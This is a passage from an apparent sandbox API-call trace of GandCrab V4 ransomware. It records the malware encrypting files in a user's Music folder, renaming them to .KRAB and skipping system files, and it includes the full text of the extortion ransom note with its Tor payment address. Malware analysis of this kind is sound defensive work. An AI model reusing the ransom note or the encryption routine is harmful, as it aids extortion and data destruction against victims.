dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.597] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.597] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.597] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.598] GetLastError () returned 0x0 [0093.598] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.598] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.598] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\1i ajshc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0093.598] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.599] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.599] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x2fef, lpOverlapped=0x0) returned 1 [0093.629] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffffd011, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.629] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2fef, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x2fef, lpOverlapped=0x0) returned 1 [0093.629] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0093.630] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.665] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.666] CloseHandle (hObject=0x778) returned 1 [0093.666] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.666] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\1i ajshc.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\1i ajshc.wav.krab")) returned 1 [0093.669] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.669] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.669] lstrcmpW (lpString1="cHy7.wav", lpString2=".") returned 1 [0093.669] lstrcmpW (lpString1="cHy7.wav", lpString2="..") returned 1 [0093.669] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="cHy7.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav" [0093.669] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.673] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav.KRAB") returned 59 [0093.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav") returned 54 [0093.673] lstrlenW (lpString=".wav") returned 4 [0093.673] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.674] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.674] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav") returned 54 [0093.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav") returned 54 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="desktop.ini") returned -1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="autorun.inf") returned 1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="ntuser.dat") returned -1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="iconcache.db") returned -1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="bootsect.bak") returned 1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="boot.ini") returned 1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="ntuser.dat.log") returned -1 [0093.674] lstrcmpiW (lpString1="cHy7.wav", lpString2="thumbs.db") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="ntldr") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="NTDETECT.COM") returned -1 [0093.675] lstrcmpiW (lpString1="cHy7.wav", lpString2="Bootfont.bin") returned 1 [0093.675] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.675] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10111b0) returned 1 [0093.676] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.676] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.676] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.677] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.677] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0093.677] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.677] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10111b0) returned 1 [0093.681] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.682] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.682] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.682] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.682] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0093.682] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.682] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0093.683] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.683] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.683] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.683] GetLastError () returned 0x0 [0093.683] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.683] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0093.684] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.685] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.685] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.685] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.685] GetLastError () returned 0x0 [0093.685] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.685] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.685] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\chy7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0093.689] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.689] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.690] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x15d47, lpOverlapped=0x0) returned 1 [0093.721] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffea2b9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.721] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15d47, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x15d47, lpOverlapped=0x0) returned 1 [0093.721] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0093.721] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.729] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.730] CloseHandle (hObject=0x778) returned 1 [0093.731] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.731] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\chy7.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\cHy7.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\chy7.wav.krab")) returned 1 [0093.732] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.733] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.733] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.733] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.733] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock" [0093.733] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.733] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 74 [0093.733] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock") returned 69 [0093.733] lstrlenW (lpString=".lock") returned 5 [0093.734] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.734] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.734] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.734] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.735] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.735] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.735] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.735] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt" [0093.735] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.735] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt.KRAB") returned 67 [0093.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt") returned 62 [0093.735] lstrlenW (lpString=".txt") returned 4 [0093.735] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.736] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.736] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt") returned 62 [0093.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\KRAB-DECRYPT.txt") returned 62 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.736] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.736] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.737] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.737] lstrcmpW (lpString1="L42BKK", lpString2=".") returned 1 [0093.737] lstrcmpW (lpString1="L42BKK", lpString2="..") returned 1 [0093.737] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="L42BKK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK" [0093.737] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\" [0093.737] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.738] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.738] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.738] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.738] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\\\KRAB-DECRYPT.txt") returned 70 [0093.738] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\L42BKK\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\l42bkk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0093.739] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.739] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.740] CloseHandle (hObject=0x778) returned 1 [0093.740] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.740] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.741] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x3a8)) [0093.741] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.742] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.742] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, 